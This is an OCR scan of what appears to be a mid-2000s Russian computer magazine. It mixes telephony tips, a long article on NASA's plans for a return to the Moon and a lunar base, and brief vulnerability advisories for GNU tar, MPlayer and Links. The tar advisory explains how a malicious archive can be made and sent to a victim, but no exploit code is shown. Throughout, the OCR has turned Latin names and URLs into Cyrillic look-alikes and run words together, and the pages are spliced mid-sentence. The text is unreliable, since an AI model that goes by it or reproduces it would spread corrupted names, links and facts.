бы вызватьабонента с горячей клавишей 34 
через телефон-шлюз +7 800 800 800 8 нужно 
набрать следующее: +78008008008р*34#. 

Кстати говоря, даже необязательно забивать 
номера для быстрого вызова, а можно просто 
ввести номер нужного тебе человека в между- 
народном формате (добавив в начале номера 
два нуля): +78008008008р*0079206131212#. 3= 



ПОЛЕЗНЫЕ ПРОГРАММКИ 



Если часто звонить за границу, попасть впросак не мудрено. Бывает, забудешь о разнице во времени или просто будешь долго 
ломать голову над номером телефона, пытаясь разобраться, что в этой последовательности цифр является кодом страны, что 
— кодом города, а что — непосредственно номером телефона. Для того чтобы таких заминок было как можно меньше, реко- 
мендую взять на вооружение небольшую программу Соиглгу Собе§ ( ѵѵѵѵѵѵ.ігохгопе.сот ) . В ее базу данных включена инфа о бо- 
лее чем 250 странах мира: международный телефонный код, коды самых больших городов, принятые сокращения для стран 
(код ЮС), доменное имя первого уровня, сокращения для национальной валюты и официального языка, расположение, нацио- 
нальный флаг. Информацию можно получить также, просто введя ІР-адрес интересующего тебя человека. 

Лично я ненавижу копаться в прайсах и считать, в какую стоимость выйдет тот или иной разговор. Хорошо, когда звонишь 
по популярным направлениям (зная, что цена едва ли будет больше двух центов), но если требуется вызвать Уругвай? 

Для этих случаев в своем арсенале я держу небольшую программу — Цены ЗкуреОШ 1 ( ѵѵѵѵѵѵ.зкуресІиЪ.ги/Шез/гаЕез.ехе ) . 

Этой утилите достаточно указать номер телефона в международном формате, а также длительность разговора, после чего 
ты сразу получишь точную цену тарификации. 

Программы Ратеіа (ѵѵѵѵѵѵ.ратеіа-зузгетз.сот ) и 5АМ (ѵѵѵѵѵѵ.кізіікізіі.сот ) пригодятся тебе, если захочешь настроить себе 
автоответчик. Причем, помимо всех стандартных функций, ЗАМ предоставляет интересную фишку — Ѵоісе Зггезз 
Апаіузіз, или, проще говоря, детектор лжи. 
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ІЮРИЙ СВИДИНЕНКО 






О ТОМ, КАК ЧЕЛОВЕЧЕСТВО БУДЕТ ВОЗВРАЩАТЬСЯ НА ЛУНУ 






ДУБЛЬ ВТОРОЙ 





^ ітріап^ 



Были ли американцы на Луне или нет — это науке неизвестно. Но то, что они собира- 
ются туда снова, — неоспоримый факт, ибо как еще объяснить раздувание бюджета 
ИА5А и заявления Джорджа Буша? В этой статье ты узнаешь о том, как именно и зачем 
человечество собирается покорять Луну во второй раз. 




> «Огіоп» также будет перевозить 
грузы на МКС 



>Первыелюди на Луне- какдавноэто было 



> «Лунное кресло» для быстрых 
лунных перелетов 



ВТіскеИо Ліе Мооп 

Итак, занимай место возле иллюминатора 
и пристегивайся покрепче: тебе повезло — у те- 
бя на рукахбилетна Луну на 2020 год. Именно 
тогда намечается ввод в действие первой 
рабочей лунной базы человечества. 

Нужно это титаническое по затратам и слож- 
ности предприятие для того, чтобы подготовить 
людей к жизни на небесных поверхностях 
и отработать технологии самообеспечения для 
того, чтобы в будущем покорять Марс и другие 
небесныетела. Однако лунная экспансия пре- 
следует и корыстные цели, о которых я расска- 
жу ниже. 

Пока еще неизвестно, будетли лунная база 
международной или же все финансовые 
и техническиетяготы понесет агентство 
МА5А. Но уже все космические державы в курсе 
того, что проектзапущен в полную силу и из 
карманов американских налогоплательщиков 
вытащена энная сумма денег не только на воз- 
вращение на Луну, но и на постоянное пребы- 
вание команды астронавтов на ней в качестве 
первых внепланетныхжителей. 

О Рабочая лошадка «СЕѴ Огіоп» 

После аварии миссии «Аполло-13» многие 
задумались о том, как повысить безопас- 
ность лунных перевозок. Но тогда, поми- 
мо косметических доработок кораблей 
«Ароііо» и «І_ЕМ», ничего революционно нового 
агентство ЫА5А не предложило. 

Через некоторое время о полетах на Луну 
забыли, и вот, в конце девяностых, когда 
снова встал вопрос о возвращении на наш 
спутник, инженеры задумались о деталь- 
ном пересмотре конструкции той «рабочей 
лошадки», которая будет перевозить аст- 
ронавтов к месту назначения. Так появился 
проект «Сгеѵѵ Ехріо гаЛоп Ѵебісіе» (СЕѴ) 
(«Пилотируемого исследовательского кораб- 
ля»), Что интересно, СЕѴ будет не только ра- 
ботать на Луне, но и осуществлять постоян- 



ные полеты к МКС, заменив уже технически 
и морально устаревшие шаттлы. 

Естественно, для доставки СЕѴ на земную орби- 
ту по-прежнему нужна ракета -носитель. Инже- 
неры ЫА5А предлагают использовать для этого 
стандартный прием: одинтвердотопливныйус- 
коритель от шаттла (первая ступень) и жидкост- 
ная вторая ступень с двигателем опять-таки от 
современного челнока. Грузоподъемность этого 
носителя — 25тонн на низкую орбиту. 
Коническая форма капсулы СЕѴ продикто- 
вана соображениями аэродинамической 
устойчивости и прочности при возвращении 
в атмосферу на высокой скорости. Это самое 
простое и оптимальное для данной задачи 
решение. Сама же капсула СЕѴ, по замыслу 
агентства, должна быть рассчитана на 1 0 
полетов. Ее нужно будетлишь каждый раз 
оснащать новым тепловым щитом и стыковать 
с новым сервисным модулем. 

При проектировании корабля СЕѴ ракетчи- 
ки ЫА5А решили не изобретать велосипед 
и оставить архитектуру кораблей «Ароііо»: ци- 
линдрический «технический» отсек (он зовется 
«сервисным модулем») и коническая возвра- 
щаемая капсула с экипажем. Также предусмот- 
рена система аварийного катапультирования 
экипажа при возникновении аварий на старте 
(САС). Это маленькая ракета, закрепленная 
на вершине капсулы, которая сможет отвести 
корабль с экипажем от носителя в случае само- 
го страшного вида аварий — пусковой аварии 
— на любом этапе выведения, начиная состар- 
тового стола. Самое интересное, что впервые 
работоспособные САС появились в СССР. А их 
первое активное внештатное спасение было 
произведено при пуске корабля «Океан» с Ти- 
товым на борту. 

Так как СЕѴ будет принимать на борт больше 
космонавтов, чем «Ароііо», то, естественно, его 
размеры значительно превышают габариты 
старых кораблей: внешний диаметр состав- 
ляет5,5 метров, а жилой объем по сравнению 



Та же ЭрасеОеѵ снова удивляет всех: 
«Человека можно доставить на Селену 
(и вернуть, разумеется, домой) менее чем за 
10 миллиардов долларов». В то время как 
планы МА5А предусматривают на освоение 
Луны 104 «лунных» миллиарда долларов (за 
13 лет). Откуда десятикратная разница? Каж- 
дая миссия, как предполагаютавторы 
исследования, должна доставить на около- 
лунную орбиту или на поверхность нашего 
небесного соседа обитаемый модуль, ко- 
торый оставался бы на месте после миссии 
и могбы быть использован при следующем 
визите на Луну. 

Это еще не базы в традиционном 
понимании, но сетьопорных пунктов, об- 
легчающих и удешевляющихлунную 
программус каждым новым рейсом. Кро- 
метого, компания предложила смелое 
новшество — каждого астронавта по отде- 
льности можно высадить на Луне вовсе без 
корабля. Точнее, на необычном аппарате 
типа «ракетного кресла», в котором человек 
сидел бы в скафандре. Четыре таких кресла 
вместе с жилым модулем — вотуже и готовый 
ап парат для лунной экспедиции. 

Причем «кресло» можно было бы исполь- 
зовать как в пилотируемом варианте, так 
и в беспилотном. В последнем слу- 
чае собственно сиденье заменялось 
бы, по модульному принципу, на набор 
оборудования. А связка из четырех 
кресел, дополненная миниатюрной 
капсулой (приспособленной к спуску 
в атмосфере), располагала бы достаточным 
запасомтяги и топлива, чтобы возвратиться 
к Земле. Такая универсальность направлена 
на снижение затрат и повышение скорости 
разработки луннойтехники. 
ЭрасеОеѵуверена, что уже где-то между 
2010-м и 2015-м годами человека можно 
будет высадить на южном полюсе Луны. 
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>Вотон какой -<<І_ипаг Репдиіп» 

Пингвин — птица не летающая, но почему- 
то именнотакбыл назван новый автома- 
тический лунный исследователь, главное 
достоинство которого — способность к вир- 
туозному парению и прыжкам над серыми 
просторами нашего спутника. 

Американская фирма ПауіИеоп пред- 
лагает высадить на Луне «Лунного 
пингвина» («би па г Репдиіп») в 2009 
году. Аппарат высотой примерно 1 метр и ве- 
сом 105 килограммов способен к огромным 
прыжкам на Луне благодаря маленьким 
реактивным двигателям. Робот сможет 
перескочить в сторону на целый километр 
и, по замыслу его авторов, сможет сделать 
несколько таких прыжков, возможно, и на 
большее расстояние. 

Компания позиционирует«Репдиіп» как 
универсальноетранспортное средство, спо- 
собное доставить на поверхностьЛуны 
небольшое научное оборудование с неви- 
данной ранееточностью. 

Уникальная особенность проекта — способ- 
ность робота к многократному включению 
своих двигателей и очень осторожному 
автоматическому маневрированию над 
лунной поверхностью. «Репдиіп» ис- 
пользуетдвигатели, «мозги», датчики 
и системы наведения, позаимствованные 
у ракет«земля — воздух», крылатой ракеты 
«Томагавк» и перспективного заатмос- 
ферного перехватчика «Ехоаітозрбегіс 
КІІІѴеЬісІе» (ЕКѴ), разрабатываемого 
РауіЬеоп. ЕКѴ — часть новой системы проти- 
воракетной обороны США. 
«Фотографическая» точность, благодаря ко- 
торой роботсможеториентироваться по лун- 
ным картам, — серьезное преимущество 
корабля перед возможными конкурентами. 
Специалисты компании говорят, что 
построить и запустить эту машину 
можно будет, по меркам космической 
отрасли, очень быстро. 



с «Ароііо» вырос в 2,5 раза. При полетах 
на МКС команда СЕѴ состоит из шести 
человек, а на Луну отправляются 4 астронавта. 

В 70-хк Луне в одном рейсе летели трое. Один 
оставался на окололунной орбите, а двое — вы- 
полняли посадку в так называемой «лунной 
кабине». Теперьже все 4 астронавта переходят 
в лунный модуль, а автоматический СЕѴ остает- 
ся на лунной орбите. 

Не стоит говорить о том, что вся «начинка» ко- 
рабля будет выполнена по последнему слову 
техники 2015-2020 годов. Двигатели корабля 
и подъемные двигатели лунного модуля будут 
работать на жидком метане. Для ракетострое- 
ния это пока экзотическое топливо. 

Одна из особенностей корабля заключается 
в том, что он сможет прилуниться практичес- 
ки в любом месте Селены и развернутьтам 
прицепленный к нему лунный модуль. ЫА5А 
пишет, что хочет посылать по две экспедиции 
на Луну каждый год, что должно ускорить созда- 
ниетам постоянной базы. 

Разработку и постройку прототипа возложили 
на компанию БоскЬееб Магііп Согр, которая 
в представлении не нуждается. Интересно, что 
конкурентом БоскИееб Магііп была неслабая 
компания КІогІІігор Ѳгиттап, но из-за каких- 
то соображений ЫА5А передала дела по СЕѴ 
Огіоп авиамагнату. 

□Жизнь на Луне 

Итак, знаменательное решение было принято 
на 2-й Конференции по исследованию космо- 
са (2псІ Зрасе Ехріогаііоп Сопкгепсе) в конце 
2006 года. 

Глобальная исследовательская стратегия 
(ѲІоЬаІ Ехріогаііоп Зітаіеду) предусматривает 
ряд тестовых полетов к Луне, затем высад- 
ку в 2020 году четверки астронавтов на ее 
поверхность. И уже через 4 года там же будет 
возведена постоянно действующая база. 

Это новая официальная стратегия ЫА5А, ко- 
торую президент Буш охарактеризовал кратко 
и емко: «Мы возвращаемся на Луну». 

Не думай, что теперь ЫА5А будет лихорадочно 



думать, какжеэто все организовать и какие 
виды системжизнеобеспечения и связи 
будуту колонистов. Наступление на Луну 
было детально спланировано еще в 2002- 
2003 годах, но предшествующий директор 
МАЗА не был сторонником пилотируемых 
экспедиций, поэтому финансировались только 
планы лунной миссии. Теперьже на возвра- 
щение к Селене ЫАЗА получит около 0,6% 
американского бюджета. И поэтомуто, что 
было обнародовано на конференции, яви- 
лось логическим завершением «возвратно- 
лунного» процесса, начатого еще в девяностых 
годах прошлого века. 

Кроме МАЗА, в планировании лунного обита- 
лища принимаютучастие ІЗаэрокосмических 
агентств и несколько коммерческих и негосу- 
дарственных организаций. Россияже, по сло- 
вам пресс-секретаря «Роскосмоса» Игоря 
Панарина, с удовольствием приметучастие 
в программе США по освоению Луны, если 
американцы возьмут на себя все проблемы 
с финансированием. 

Новая глобальная исследовательская стратегия 
должна осветить сразу 2 вопроса: почему надо 
возвращаться на Луну и что мы планируем там 
делать. Основа стратегии —так называемая 
«лунная архитектура». Как ты догадываешься, 
это все, что связано со строительством зданий 
для людей и техники. 

Группа лунной архитектуры (Бипаг АгсЫіесІшге 
Теат), работающая при ЫАЗАс мая, при- 
шла к выводу, что лучшим вариантом бу- 
дет база, построенная в районе одного из 
полюсов и снабжаемая энергией отсолнечных 
батарей. Однако сейчас специалисты ЫАЗА 
не знаютточно, какой из полюсов окажется 
удобнее. Скорее всего, для строительства 
базы будетоптимальным южный полюс, где 
находится кратер Шеклтона, который почти все 
время освещен солнцем, — только такое место 
можно назвать идеальным для постоянного 
получения энергии, необходимой будущей 
станции. Но окончательный выбор места можно 
будет сделать после запуска аппарата «Бипаг 
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> Обустройство базы — дело хлопотное 

Ресоппаіззапсе ОгЬііег», запланированного на 
октябрь 2008 года. 

Грузы на базу и обратно можно будет достав- 
лятьс помощьютогоже самого комплекса 
— один рейс каждые 6 месяцев. СЕѴ можно 
будет использовать в качестве беспилотного 
грузовика. И тогда же время пребывания каж- 
дого конкретного экипажа на Луне может быть 
расширено до шести месяцев. 

Цель серии первых экспедиций на Луну — на- 
учиться житьтам с частичным использованием 
местных сырьевых и энергетических ресурсов 
для выработки ракетного топлива и кислорода 
для дыхания. Плюс, конечно, новые научные 
исследования. 

По поводу конкретных планов относи- 
тельно самого лунного «жилища» ничего 
не сказано, но некоторыетребования 
к нему МА5А уже сформулировало: мес- 
то нахождения астронавтов должно быть 
энергетически автономным, мобильным 
(это мы уже знаем), с замкнутым циклом 
жизнеобеспечения. Оно, конечно, должно быть 
и безопасным, но в свете последних исследо- 
ваний метеоритных атакэтот вопрос кажется 
особенно сложным. 

Ядром лунной станции сначала будет спускае- 
мый аппарат, доставленный на Селену кораб- 
лем СЕѴ. Послетого какастронавты обживут 
место посадки, ЫА5А планирует доставить 
несколько жилых модулей, стыкующихся между 
собой. Тогда же будут проведены работы по раз- 
вертыванию системы энергоснабжения базы 
от солнечных батарей, построению системы 
утилизации отходов и начало научно-исследо- 
вательских работ. 

Одним из первых научно-исследовательских 
инструментов будет телес коп, так как благода- 
ря отсутствию у Луны атмосферы искажений 
при наблюдениях меньше. Да и обслужи- 
вать телескоп, находящийся все время «под 
рукой», проще, чем знаменитый «НиЬЫе». 
Одной из основныхзадач лунной базы будет 
добыча грунта, причем не только для того 
чтобы обеспечить астронавтов кислородом 



и водой. В теории «лунатики» должны собирать 
гелий-3 — топливо, необходимое для земной 
энергетики. 

Если посмотреть лет на 10 вперед, то мы 
увидим первый работающий термояд — ИТЭР 
(строящийся уже сегодня), который бу- 
дет первой ласточкой термоядов нового 
поколения. А после ИТЭР можно говоритьо со- 
здании более мощных и экологически чистых 
термоядов, использующих в качестветоплива 
тот самый гелий-3. Что будете нефтью через 
20 лет, ты знаешь сам, поэтому уже сегодня все 
страны ищут «топливную альтернативу», и все- 
го 1 0Отонн гелия-3 смогутобеспечить целый 
год (!) мирового потребления энергии. Это ко- 
личество соответствуеттрем-четырем рейсам 
шаттлов. Представляешь? 3-4 ходки — и Земля 
экологически чисто гудит целый год! Что может 
быть проще и доступнее? 

Однако для этого надо перекопать около милли- 
арда тонн лунного грунта. Для Земли это не та- 
кое большое количество по меркам горной 
промышленности. Одного угля за год в мире 
добывают2 миллиарда тонн (в России — около 
300 миллионовтонн). 

Но представь, как организовать похожую 
добычу на Луне, до которой только долететь 
— известный геморрой? 

Для получения самого гелия-3 из породы 
реголита, нагретого до нескольких сотен граду- 
сов при помощи зеркала-концентратора сол- 
нечных лучей, нужно еще отделить собственно 
гелий-3 от гораздо большего количества других 
газов, в основном от гелия-4. Это делают, ох- 
лаждая газы до жидкого состояния и пользуясь 
незначительной разницейтемператур кипения 
изотопов (4,22 К для гелия-4 или 3,19 К для 
гелия-3). 

Но все это понятно в земныхусловиях, а как 
это сделать на Луне? А на Луне занимать- 
ся всем этим придется в безвоздушном 
пространстве. Причем для таких объемов 
добычи на Луну придется переселять не 7 
астронавтов, а целый шахтерский поселок, 
что будет возможно явно не сразу. Хотя одна из 



Одна частная компания из СШАхочет пост- 
роить корабль, который ЫА5А проектировало 
два десятилетия назад какальтернативу 
шаттлу. Потратив 2 миллиарда олларов, 
агентство отказалось от этой концепции 
челнока. А частники собираются возить 
на этом корабле туристов и астронавтов на 
орбиту и МКС. 

Детище ЭрасеОеѵ — корабль«0хотникза 
мечтой» («Огеат СИавег») построен на 
основе концепции челнока «НЕ-20», 
которым ЫА5А увлекалось в 1980 годах. 
ТеперьЭрасейеѵ говорит, что«0хотникза 
мечтой» может поднять четырех человек 
по суборбитальной траектории в космос уже 
в 2008 году, если удастся получить $20-мил- 
лионное финансирование, источники 
которого, по словам ее представителей, 
еще не идентифицированы. 

А дополнительные 1 00 миллионов долла- 
ров сделают к 2010 году возможным полет 
«Огеат СЬазег» с шестью людьми на борту 
на Международную космическую станцию 
(НЕ-20, кстати, был рассчитан на 1 0 человек). 
Планируется, что «Охотникза мечтой», 
каки шаттл, будет стартовать верти- 
кально, а приземляться горизонтально. 

Но поскольку он не предназначается для 
перевозки тяжелых грузов, то и по своим 
размерам он станет примерно в 4 раза 
меньше и в 8 раз легче, чем шаттл высо- 
той 9 метров и весом 1 0 тонн. В отличие 
от шаттла, в пусковой установке «Огеат 
СЬазег» не будет использоваться крио- 
генное топливо, чьи баки должны быть 
изолированы пеной, куски которой имеют 
обыкновение отрываться при взлете. 



>«Охотникза мечтой» 
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> Отпечаток первого шага полунной 
поверхности 

Пока МА5А подбирает на Луне место для 
базы, адвокаты ООН ломают головы: как 
вежливо «избавиться» от «лунных собс- 
твенников» — миллионов граждан разных 
стран, которые в результате юридического 
курьеза стали обладателями участков на 
Селене. 

В дремучем 1 980 году американец Деннис 
Хоуп нашел лазейку в «космическом» согла- 
шении ООН от 1 967 года. Там сказано, что 
никакая страна или правительство не могут 
предъявлять права на земли вне нашей 
планеты, однако ничего не сказано об 
индивидуальной или корпоративной 
собственности. Поэтому мистер Хоуп 
заявил о том, что Луна и другие небесные 
тела в солнечной системе являются его 
собственностью, и начал быстро распрода- 
ватьучастки на Селене и на Марсе. 

Как мистер Хоуп, так и те, кто участвовал 
в распространении его собственности 
в разных странах, неплохо заработали. При- 
мерно 9 миллионов долларов — такова 
сумма, вырученная от проданныхучастков 
на Луне. Казалось бы, находчивости Хоупа 
можно поаплодировать и порадоваться за 
остроумный бизнес. Но вот что будут делать 
правительства, когда придет время всерьез 
осваивать Луну? 

Адвокаты в ООН говорят, что претен- 
зии мистера Хоупа на Лунулишены 
оснований. Это относится и ко всем 
«собственникам», которым он продавал 
(и продаетсейчас] участки. Поэтому им 
всем придется махнуть рукой на потра- 
ченные деньги илижелететь на Луну 
и заявлятьсвои права непосредственным 
«столблением», какэто было в Америке во 
времена индейцев. 



> Младший брат«НиЬЫе» на Луне 



неафишируемых целей лунной миссии — имен- 
но разведка: насколько реальна массовая 
добыча лунного топлива в подобныхусловиях. 
Но вот если удастся наладить добычу гелия-3, то 
одна тонна будет стоить как минимум миллиард 
долларов. А если пересчитать энергетический 
потенциал гелия в нефтяной эквивалент, то 
«лунная нефть» обойдется человечеству 
по бросовой цене 7 долларов за баррель. 

Так какастронавтов на базе будетявно недо- 
статочнодля решения поставленныхзадач, для 
того чтобы развязать им руки, ЫА5А разра- 
батывает широкий класс роботов, которые 
будут помогать в рутинных задачах — в добыче 
грунта, обслуживании систем базы и проведе- 
нии научно-исследовательских экспериментов. 
Серьезное строительство на Луне начнется, ра- 
зумеется, нескоро, но МА5А уже имеет прибли- 
зительное видение этого проекта. Сам процесс 
строительства будет постепенным, и сначала 
им займутся команды астронавтов из четырех 
человек, отправляемых на Луну на недельные 
«вахты». 

Первая «вахта» прибудет на Луну в 2020 
году, а после этого начнутся 180-дневные мис- 
сии уже по подготовке к полетам на Марс. 

Перед началом строительства намечено не- 
сколько предварительных роботизированных 
миссий, которые в дальнейшем помогут работе 
астронавтов. Машины проведут разведку 
местности, выполнятанализ природных ре- 
сурсов и сведут к минимуму риск при посадке 
кораблей с астронавтами. Построить свои 
базы на Луне хотят многие страны, например 
Япония. 

О «Хьюстон, у нас проблема!» 

Со времен первых космических полетов 
у пилотов возникают разные проблемы. 

И хорошо, если все заканчивается 
благополучно, но зачастую аварии 
приводят к гибели людей и превра- 
щению дорогостоящих машин в груду 
металлолома. Естественно, полеты 
и дальнейшая жизнь на Луне — занятия 
крайне опасные ввидутого, что неизвестно, 
какие неприятности могут при этом 



возникнуть. Вдруг произойдет вне- 
запная разгерметизация? Куда девать 
космонавтов? Не лететь же в СЕѴ на 
Землю? А вдруг это и невозможно будет 
сделать за несколько часов? 

Коротко говоря, МА5А собирается ре- 
шать подобные проблемы по мере их 
возникновения. Но от некоторых «лунных 
неприятностей» можно застраховаться уже 
сегодня. Например, одну изтаких проблем 

— проблему пыли — на Луне и на Марсе 
нужно решить прежде, чем посылатьтуда 
экспедиции. Опыту человечества уже есть — 

30 лет назад с ней столкнулись астронавты 
миссий «Ароііо». 

Абразивная и тонкая пыльзагрязняетоптику 
приборов, повреждаетсочленения скафандров 
(вплоть до небольшихутечек воздуха) и даже 
вызывает проблемы со здоровьем, так как 
неизбежно попадает в корабль и, в конечном 
счете, в легкие путешественников. Кроме 
этого, она загрязняет белые покрытия 
приборов, вызывая их перегрев. 

Самое страшноето, что под действием солнеч- 
ного ультрафиолета пыль получаетэлектричес- 
кий заряд и долго парит в воздухе, цепляясь 
к противоположно заряженным объектам 

— лунному модулю и астронавтам. Ночьюже 
лунная пыльна обширных серых просторах 
приобретает отрицательный заряд, поскольку 
бомбардируется свободными электронами из 
состава солнечного ветра. Эта самая электро- 
статика приводит не только к налипанию пыли 
на скафандры и оборудование. Электрический 
заряд накапливается луноходами и людьми, ко- 
торые ходят по лунной поверхности, так 
каклунный грунт— реголит— не проводит 
электричество. И если после рабочего дня 
получивший электрический заряд космо- 
навт подойдет к кораблю и прикоснется к его 
поверхности, то между пальцем и обшивкой 
проскочит маленькая искра, которая может 
стать смертельной — вспомни, как в 30-х годах 
прошлого века загорелся и погиб дирижабль 
Гинденбург. Но, естественно, при должном 
экранировании и защите взрыва не произой- 
дет. Но электростатика запросто может вывести 
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>СЕѴ Огіоп доставляетлунный модуль 



> Полностью герметичный луноход МАЗА планирует ввести в 2027 году 



из строя ту или иную электронику на борту. 

Один из способов борьбы с пылью — нагреть лун- 
ный грунт до образованиятвердой корки, и тогда 
на такой «стеклянной» поверхности астронавты 
смогутобосноваться без боязни нахвататься 
пыли. Дело в том, что в реголите содержится мно- 
гожелезных наносфер, которые при воздействии 
на них микроволнового излучения прекрасно 
плавятся, образуя твердую поверхность. 

Поэтому многиеученые предлагаютснаб- 
дить излучателями-магнетронами лунную 
тележку и прокатить ее, как каток, по лунной 
поверхности. Она будет плавить и разгла- 
живать верхний слой реголита, создавая 
плотные дорожки и площадки без пыли. А це- 
лая армия таких машин могла бы расплавить 
и превратить в гладкую вогнутую поверхность 
какой-нибудь кратер. Поставив в центр мачту 
с приемником, мы получим радиотелескоп. 

С электростатикой же бороться труднее. 

На Земле инженеры просто сделали бы 
заземление. Но на Марсе и Луне, где напрочь 
отсутствует влага, это не прокатит. На Луне 
придется закапывать в грунт большие листы 
алюминия или длинные петли алюминиевых 
проводов, которые и будут собирать лиш- 
ний заряд. На Марсеже можно поступить 
проще, сбрасывая электростатику в атмосферу 
с помощью игл. На марсоходах уже ставят 
иглы, стольтонкие (0,02 миллиметра), что элек- 
тричество сбегает по ним в марсианский воздух 
(громоотвод наоборот). 

Но эффективнее был бы другой прибор 
— крошечный радиоактивный источник, типа 
используемого в датчике дыма, который можно 
прикрепить к каждому скафандру и к базе. Аль- 
фа-частицы низкой энергии улетали бы 
в разреженную атмосферу, ионизируя ее 
молекулы. Таким образом атмосфера непос- 
редственно вокруг места деятельности людей 
стала бы электропроводной и нейтрализовыва- 
ла бы лишний заряд — так предлагает поступить 
физик Джефри Лэндис из МАЗА. 

Ученые надеются, что, научившись справлять- 
ся с лунной пылью и ее вредным влиянием, че- 
ловечество сможетувереннее посмотреть 



в сторону Марса. Там существуетаналогичная 
проблема, хотя состав пыли на Марсе и ее 
свойства несколько отличаются от лунных. 

□ Впереди Марс! 

Итак, подготовив лунный плацдарм, ЫАЗА 
начинаеториентироваться на работу 
с Марсом. При тщательной подготовке лунной 
миссии между высадкой на Луне и высадкой на 
Марсе может пройти от пяти до десяти лет. Оп- 
тимисты предлагают, что обе миссии будут 
осуществляться одновременно. 

По мнениюученых МІТ, для миссии на Марс 
оптимальным вариантом будет отправка СЕѴ 
на орбиту вокруг Марса, где его должен ждать 
пустой меньший по размерам посадочный 
аппарат, прилетевший туда заранее. После 
стыковки астронавты перейдут в посадоч- 
ный модуль и спустятся в нем на поверхность 
планеты. Возвращаясь обратно, онитакже 
поднимутся на марсианскую орбиту, состыкуют- 

> Разведка боем — новый луноход 



ся с СЕѴ, перейдут в него и уже на нем прибудут 
на Землю. 

Эта схема немного напоминает схему миссии 
«Ароііо», но тогда весь набор модулей стартовал 
вместе. При нынешнем варианте не потребует- 
ся вновь создавать столь большие носители, 
каким был «ЗаШгп-5». 

Не обойтись и без экзотики: есть проекты, 
рассчитанные на быстрые перелеты к Марсу. 

Так, используя двигатель на антиматерии, лег- 
кий пилотируемый корабль могбы достичь 
Марса за 45-90 дней вместо полугода на СЕѴ. 
Какбытам ни было, отправляться 
с «серьезными намерениями» к Марсу, не 
«потренировавшись» на Луне, было бы 
слишком необдуманно, поэтому лунная миссия 
2020-2030 годов станет именнотакой тре- 
нировкой для человечества, своеобразной 
проверкой на прочность наших космических 
технологий. А вдруг эта проверка покажет, что 
в космос нам еще рановато? ИНИ 
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>3десь раздаютобновленный Іаг 
Е Удаленный 

обход директорий в СІМІНаг 
Вгіо'Г 

Теети Заітеіа исследовал утилиту ѲКІШаг, 
ставшую стандартным архиватором для лю- 
бого І_іпих/хВ50-дистрибутива, и обнаружил 
в ней дыру. Она похожа на ту, что была удалена 
из М5-й05-версии ркгір'а многолеттому 
назад, представляя собой обходдиректо- 
рий (сіігесііогу Ігаѵе гзаі) или, говоря другими 
словами, возможности создания архива, 
распаковывающегося не в текущем катало- 
ге, а там, где ему нужно, и затирающего все 
файлы, на которыеу него только есть права. 
Даже если распаковка производится из-под 
простого пользователя (не гооѣ'а), угроза очень 
серьезна, а во всем виноватспециальный 
тип файлов, определенный в Іа г'е артибутом 
6І\ЛІТУРЕ_ЫАМЕ5, которому соответствует 
символ «І\І» в іа г-за головке. Эти файлы могут 
распаковываться в любое место файловой 
системы, и, хотя штатными средствами создать 
такой архив нельзя, это легко осуществить 
вручную, после чего остается только выложить 
его на общедоступный сервер или послать 
жертве вместе с утренним мылом. Подробнее 
— на \ллллллзесипМосиз.сот/Ыс1/21235. 

Тэгде*5 

Уязвимость подтверждена в следующих вер- 
сиях іа г'а: 1 .1 5.91 , 1 .1 6 и 1 .1 5. Про остальные 
пока ничего неизвестно. 

Ехріо-И: 

Исходный текст вполне боевого ехріоіі'а 
лежитв архиве пеобарзіз'а: ЬіірУ/агсЬіѵез. 
пеоЬарзіз.сот/а гсЫѵез/іиЦсІІ5с[о5иге/2006- 
1 1 /0344. Ыт I 

Зоіи-Моп 

Из всех составителей дистрибутивов пока один 
лишь коллектив ЕгееВЗй выпустил специаль- 
ный патч : ЬіірУ/зесигііѵ.ігееЬзсІ.огд/раісІіез/ 
5А-06 :26/дІа г. раІсЬ . Остальныеже предпочли 
отделаться молчанием, недвусмысленно 
посылающим пользователей на официальную 
страничку ѲКІІІ іаг'а ( ѵѵѵѵѵѵ.дпи.огд/зоііѵѵа ге/іаг ) 
за свежей версией 1 .1 6.1 , из которой поддер- 
жка КІ-записей удалена, что делает распаковку 
такихархивов вообще невозможной. 



» 




> Главная страница Мріауег'а 
Е Удаленное 

переполнение буфера в МРІауег'е 
Вгіеі 7 

МРІауег — легендарный и, в каком-то смысле, 
культовый аудио/видеоплеер, знаменитый, 
прежде всего, поддержкой огромного коли- 
чества входных и выходных форматов файлов, 
кодеков, устройств ввода/вывода аудио- и ви- 
деоданных. Что самое главное, он поддержи- 
вает их правильно (в частности, только он один 
при кодировании видеофильмов следитза син- 
хрометками). Это открытый проект, распростра- 
няющийся в исходных текстах и портирован- 
ный под весь зоопарк осей: Ьі п их, хВ5й, Зоіагіз, 
ІПІХ, НР-ІІХ, АІХ, ѴѴІп32, МасОЭХ, включая такую 
экзотику, какОЫХ и Отіда/МогрЬОЗ. Естес- 
твенно, значительная часть кода МРІауег'а 
позаимствована разработчиками из сторонних 
открытых проектов, и потому МРІауегзависит 
от качества и надежности каждого их них, 
но качественный код — большая редкость, 
и дыры обнаруживаются то тутто там. В данном 
случае виновником торжества оказался модуль, 
обрабатывающий потоки РеаІМесІіа РТ5Р 
и расположенный в файлах зігеат/геаігізр/ 
азтгр.с, зігеат/геаІгізр/азтгр.Ь 
и зігеат/геаігізр/геаі.с, позаимствованных 
из библиотеки хіпе-ІіЬ. В ней 28 декабря 2006 
года была обнаружена уязвимость, связанная 
с традиционным отсутствием границ контроля 
буфера и подробно описанная специалиста- 
ми из ОеЬіап Зесигііу Асіѵізогу: ѵѵѵѵѵѵ.сІеЫап. 
огд/зесигііѵ/2006/сІ5а-1 244 . 

Тагде^з 

Уязвимость подтверждена в версиях МРІауег 
І.ОгсІ и 5ѴЫ до г2 1799 (то есть до 31 декабря 
13:27:53 2006 ІІТС). Более древние версии, по- 
видимому, также содержат эту дыру, однако они 
не проверялись. 

Ехріоі* 

Образец ехріоіі'а можетбыть найден по сле- 
дующей ссылке: ЬіірУ/сѵе.тііге.огд/сді-Ьіп/ 
сѵепате.сді?паппе=СѴЕ-2006-61 72 . 

Зоіи-Моп 

Разработчики МРІауег'а исправили код в СѴ5 
(древе разработки), однако еще не перекомпили- 
ровали выложенные двоичные файлы, предостав- 
ляя пользователям замечательную возможность 
личнозаняться сексом с компилятором. 




> І_іпк5 на моем рабочем столе 
□Удаленное 

выполнение 5МВ-команд в Ыпкз'е 

Вгіеі 7 

Біпкз — это шустрый текстовый браузер 
(широко известный в узких кругах), изна- 
чально реализованный на Ыпих'е, успешно 
портированный на кучу операционных систем 
всех мастей (хВ5Б, НРЭХ, 05/2, МасОЗХ, 
ѴѴІп32) и породивший множество клонов. 

В силу своей чрезвычайной конструктивной 
